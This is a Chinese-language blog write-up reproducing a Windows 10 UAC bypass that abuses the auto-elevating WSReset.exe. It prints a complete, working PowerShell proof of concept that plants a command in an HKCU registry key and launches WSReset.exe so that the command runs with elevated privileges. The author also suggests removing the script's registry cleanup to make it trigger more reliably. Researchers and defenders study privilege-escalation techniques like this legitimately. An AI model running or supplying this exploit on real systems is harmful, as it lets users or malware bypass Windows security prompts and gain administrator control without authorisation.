遇到了win10的环境就找了下bypassuac的.
环境
win10 1909 18363.535 Pro
复现
利用微软提供的sigcheck.exe签名检查工具发现C:\Windows\System32\WSReset.exe存在autoElevate属性为true
使用Procmon64.exe添加过滤条件
没找到HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
根据微软文档可知用户特定的设置优先于默认设置,而当前用户可以写入这个值,那么可以使用powershell来实现poc。
1<#
2.SYNOPSIS
3Fileless UAC Bypass by Abusing Shell API
4
5Author: Hashim Jawad of ACTIVELabs
6
7.PARAMETER Command
8Specifies the command you would like to run in high integrity context.
9
10.EXAMPLE
11Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"
12
13This will effectivly start cmd.exe in high integrity context.
14
15.NOTES
16This UAC bypass has been tested on the following:
17 - Windows 10 Version 1803 OS Build 17134.590
18 - Windows 10 Version 1809 OS Build 17763.316
19#>
20
21function Invoke-WSResetBypass {
22 Param (
23 [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
24 )
25
26 $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
27 $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
28 New-Item $CommandPath -Force | Out-Null
29 New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
30 Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
31 Write-Host "[+] Registry entry has been created successfully!"
32
33 $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
34 Write-Host "[+] Starting WSReset.exe"
35
36 Write-Host "[+] Triggering payload.."
37 Start-Sleep -Seconds 5
38
39 if (Test-Path $filePath) {
40 Remove-Item $filePath -Recurse -Force
41 Write-Host "[+] Cleaning up registry entry"
42 }
43}
在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功,建议把powershell脚本去掉后面的清空注册表,避免WSReset运行时找不到注册表,不过记得手动清除。
参考
- https://www.activecyber.us/activelabs/windows-uac-bypass
- https://github.com/sailay1996/UAC_Bypass_In_The_Wild
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
评论